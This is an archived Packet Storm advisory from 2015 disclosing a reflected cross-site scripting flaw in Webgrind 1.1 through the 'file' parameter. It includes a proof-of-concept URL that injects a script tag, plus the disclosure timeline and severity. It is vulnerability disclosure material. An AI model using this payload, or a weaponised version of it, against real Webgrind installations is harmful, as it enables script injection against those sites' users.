Lucene search

K
packetstormHyp3rlinxPACKETSTORM:132002
HistoryMay 22, 2015 - 12:00 a.m.

Webgrind 1.1 Cross Site Scripting

2015-05-2200:00:00
hyp3rlinx
packetstormsecurity.com
19
`# Exploit Title: Webgrind XSS Exploit  
# Google Dork: intitle: XSS  
# Date: May 20, 2015  
# Exploit Author: John Page (hyp3rlinx)  
# Website: hyp3rlinx.altervista.org  
# Vendor Homepage: github.com/jokkedk/webgrind  
# Software Link: github.com/jokkedk/webgrind  
# Version: Current release  
# Tested on: Windows 7 Firefox, IE using XAMPP  
# Category: XSS  
# CVE : NA  
  
Source:  
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt  
  
  
Product:  
Webgrind is a Xdebug Profiling Web Frontend in PHP.  
  
Advisory Information:  
=====================================================  
Webgrind is vulnerable to cross site scripting attacks.  
  
Exploit code:  
==============  
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS  
hyp3rlinx')%3C/script%3E  
  
Disclosure Timeline:  
==================================  
  
Vendor Notification May 19, 2015  
May 20, 2015: Public Disclosure  
  
  
Severity Level:  
===============  
Med  
  
Description:  
============  
  
Request Method(s):  
[+] GET  
  
Vulnerable Product:  
[+] Webgrind  
  
Vulnerable Parameter(s):  
[+] file=[XSS]  
  
Affected Area(s):  
[+] Current user.  
  
==============================  
  
(hyp3rlinx)  
`